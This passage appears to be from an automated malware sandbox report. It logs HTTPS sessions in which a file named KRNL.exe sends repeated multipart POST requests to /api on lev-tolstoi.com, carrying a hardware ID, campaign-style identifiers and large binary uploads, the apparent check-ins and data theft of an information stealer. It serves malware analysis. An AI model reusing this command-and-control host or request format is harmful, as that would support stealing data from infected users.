                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=gevvbbecklc65a9gs72ch49gvk; expires=Sun, 27 Apr 2025 14:14:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TiICTtXeblM4%2B9Z%2BSDyMH5vd4XBGXeOlgAQa%2FfqFA9hk6SYP3A1EfigCgEmKatr0mVhr%2B5VpjmyXpEcB5PVY1SLR%2Bf82eTOdQlpElbZ9B0Fx%2BdEpO6NGZi8837kuhcVax3I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540e2ff54727a-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=1984&rtt_var=778&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19100&delivery_rate=1471774&cwnd=221&unsent_bytes=0&cid=ecb171dae250f74b&ts=643&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                        2025-01-01 20:28:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        4192.168.2.449737172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:03 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=GGAL4P5RZVZH
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 8752
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:03 UTC8752OUTData Raw: 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 47 47 41 4c 34 50 35 52 5a 56
                                                                                                                                                                                                                                                        Data Ascii: --GGAL4P5RZVZHContent-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--GGAL4P5RZVZHContent-Disposition: form-data; name="pid"2--GGAL4P5RZVZHContent-Disposition: form-data; name="lid"yau6Na--629912535--GGAL4P5RZV
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:04 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=69q3plhb3svlvu2ldspu9m701n; expires=Sun, 27 Apr 2025 14:14:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9GTZ86uugcl9VSkgOvjTyjdKjN5XShMb3ZzU%2BcT%2BmW%2F6F1bcmwxDaT1ZPWtlMhuMtnjeaCYU%2BplDtqaANL88ngPiUo6WDwPqYg9xduVTGB5WU4untw8q1GhWQqxykVh2bow%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540ea3981439f-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1703&rtt_var=665&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9684&delivery_rate=1614151&cwnd=241&unsent_bytes=0&cid=cc425af5f37f61fd&ts=793&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.449738172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=2SZAJ2DN9HSSBMB80
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 20435
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC15331OUTData Raw: 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 53 5a 41 4a 32 44 4e 39 48 53 53 42 4d 42 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33
                                                                                                                                                                                                                                                        Data Ascii: --2SZAJ2DN9HSSBMB80Content-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--2SZAJ2DN9HSSBMB80Content-Disposition: form-data; name="pid"3--2SZAJ2DN9HSSBMB80Content-Disposition: form-data; name="lid"yau6Na--62991253
                                                                                                                                                                                                                                                        2025-01-01 20:28:04 UTC5104OUTData Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00
                                                                                                                                                                                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                        2025-01-01 20:28:05 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:05 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=00tkbfdvnspm3q1m15dpa8l50s; expires=Sun, 27 Apr 2025 14:14:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMFKhikIgbTsQ1nVpnLxrtBclkRvBmedYN04YIWzh0Q88uDz6kw5BZNlLOxvaDm%2F3CiQhPbF5UKfne8O3i0KBkvMMJH3w48XJQW8nzsjspuxlTSPGfrUZur2qYvKxZ6cJJk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540f31a4f434f-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1689&rtt_var=646&sent=9&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21395&delivery_rate=1679125&cwnd=209&unsent_bytes=0&cid=60b842939b6d8e33&ts=613&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                        2025-01-01 20:28:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        6192.168.2.449739172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:06 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1XSU0JOGY
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 1199
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:06 UTC1199OUTData Raw: 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 0d 0a 2d 2d 31 58 53 55 30 4a 4f 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                        Data Ascii: --1XSU0JOGYContent-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--1XSU0JOGYContent-Disposition: form-data; name="pid"1--1XSU0JOGYContent-Disposition: form-data; name="lid"yau6Na--629912535--1XSU0JOGYContent-
                                                                                                                                                                                                                                                        2025-01-01 20:28:07 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 20:28:07 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=34e1gv937kancuc1vrf0aa8u9b; expires=Sun, 27 Apr 2025 14:14:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBnlfgtv53alXFrKO5PUmok0PNQpqHD8%2FS93X3MdZHdesPV7f8eXxyvV%2B7Hlf4NToX25IT4pIqclWi%2F1SapIZmYAx2M%2FBSRgZye6pGmHDf63YSI99kn%2FShyRmxvitExeyuE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8fb540fc18234322-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2222&min_rtt=2215&rtt_var=845&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2106&delivery_rate=1284080&cwnd=221&unsent_bytes=0&cid=b95c1bcad473c732&ts=749&x=0"
                                                                                                                                                                                                                                                        2025-01-01 20:28:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                        2025-01-01 20:28:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        7192.168.2.449740172.67.157.2544432120C:\Users\user\Desktop\KRNL.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=7HO70WUPW0KCDJFRF2
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Content-Length: 568307
                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 35 31 32 33 38 44 43 35 33 31 46 31 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 48 4f 37 30 57 55 50 57 30 4b 43 44 4a 46 52 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 31
                                                                                                                                                                                                                                                        Data Ascii: --7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="hwid"3BD251238DC531F1BCFD68B774EF9B7A--7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="pid"1--7HO70WUPW0KCDJFRF2Content-Disposition: form-data; name="lid"yau6Na--62991
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16
                                                                                                                                                                                                                                                        Data Ascii: (OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23
                                                                                                                                                                                                                                                        Data Ascii: *w~V<.iQx;8%Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f
                                                                                                                                                                                                                                                        Data Ascii: ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;wo
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14
                                                                                                                                                                                                                                                        Data Ascii: XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>he
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47
                                                                                                                                                                                                                                                        Data Ascii: Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}G
                                                                                                                                                                                                                                                        2025-01-01 20:28:08 UTC15331OUTData Raw: d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d
